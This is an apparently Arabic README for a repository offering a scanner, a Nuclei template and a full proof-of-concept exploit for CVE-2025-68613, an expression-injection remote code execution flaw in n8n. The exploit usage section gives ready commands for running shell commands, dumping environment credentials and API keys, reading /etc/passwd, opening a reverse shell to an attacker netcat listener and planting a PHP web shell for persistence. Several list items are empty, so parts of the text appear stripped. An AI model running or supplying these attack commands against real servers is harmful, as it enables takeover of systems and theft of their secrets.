
PoC عام + ماسح ضوئي وبحث لـ CVE-2025-68613: ثغرة RCE حرجة في أتمتة سير العمل n8n عبر حقن التعبيرات (CVSS 10.0). يتضمن أدوات كشف، واستغلالًا كاملًا، وإرشادات المعالجة.

CVE-2025-68613 هي ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد (RCE) اكتُشفت في n8n، وهي منصة أتمتة سير عمل مفتوحة المصدر وشائعة. تسمح هذه الثغرة للمستخدمين المصادَق عليهم بتنفيذ تعليمات برمجية عشوائية على الخادم، مما قد يؤدي إلى اختراق النظام بالكامل.
n8n هي منصة أتمتة سير عمل مفتوحة المصدر تتيح للمستخدمين:
تستخدم المؤسسات n8n من أجل:
هذا الدور المحوري في البنية التحتية لتقنية المعلومات يجعل الثغرات خطيرة بشكل خاص، إذ يمكنها أن تمنح المهاجمين وصولًا إلى الشبكات بالكامل والبيانات الحساسة.
يتضمن هذا المستودع أدوات جاهزة للاستخدام لاختبار اكتشاف الثغرات والاستغلال:
cve-2025-68613-scanner.pyالغرض: اكتشاف آمن وغير استغلالي لنسخ n8n الضعيفة
الميزات:
الاستخدام:```bash python3 cve-2025-68613-scanner.py -u http://target:5678
**المخرجات**:
- رمز الخروج 0: غير مُعرَّض للثغرة
- رمز الخروج 1: الإصدار غير محدد (قد يكون مُصحَّحًا أو مخفيًا)
- رمز الخروج 2: تم اكتشاف إصدار مُعرَّض للثغرة
### 2. قالب Nuclei: `CVE-2025-68613.yaml`
**الغرض**: اكتشاف الثغرات تلقائيًا واختبار تقييم التعبيرات الأساسي
**الميزات**:
- يتطلب رمز مصادقة صالحًا
- يختبر قدرة حقن التعبيرات
- يحاول قراءة السياق العام لـ Node.js (process.platform)
- ينشئ سير عمل اختبارية للتحقق من ناقل RCE (تنفيذ الأوامر عن بُعد)
- تصنيف الخطورة حرج وفقًا لـ CVSS 10.0
**الاستخدام**:```bash
# Single target with known token
nuclei -t CVE-2025-68613.yaml -u http://target:5678 -v
# Multiple targets
nuclei -t CVE-2025-68613.yaml -l targets.txt
exploit_cve-2025-68613.pyالغرض: إثبات مفهوم كامل للاستغلال مع حمولات هجوم متعددة
الميزات:
المتطلبات:
التثبيت:```bash pip install requests chmod +x exploit_cve-2025-68613.py
**أمثلة الاستخدام**:```bash
# Gather system information
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload info
# Execute system command (whoami)
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload cmd --command "whoami"
# Extract all environment variables (credentials, API keys)
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload env
# Read sensitive files
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload read --file "/etc/passwd"
# Establish reverse shell (requires netcat listener)
# On attacker machine: nc -lvnp 4444
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444
# Write a web shell for persistence
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload write \
--file "/tmp/shell.php" --content '<?php system($_GET["cmd"]); ?>'
كيف يعمل:
this.constructor.constructor()process.platform أو واجهات برمجة تطبيقات Node.js الأخرىرموز الخروج:
بعبارات بسيطة: يتيح n8n للمستخدمين كتابة تعبيرات في سير العمل لمعالجة البيانات ديناميكيًا. ومع ذلك، يتم تقييم هذه التعبيرات دون عزل مناسب، مما يسمح للمهاجمين بالخروج من سياق التنفيذ المقصود وتنفيذ تعليمات برمجية عشوائية على الخادم.
عند إنشاء سير عمل في n8n، يمكنك استخدام "التعبيرات" لمعالجة البيانات. يُفترض أن تعمل هذه التعبيرات في بيئة مقيدة. ومع ذلك، تُظهر الثغرة أن هذه التعبيرات يمكنها الوصول إلى النظام الأساسي، مما يسمح للمهاجم بـ: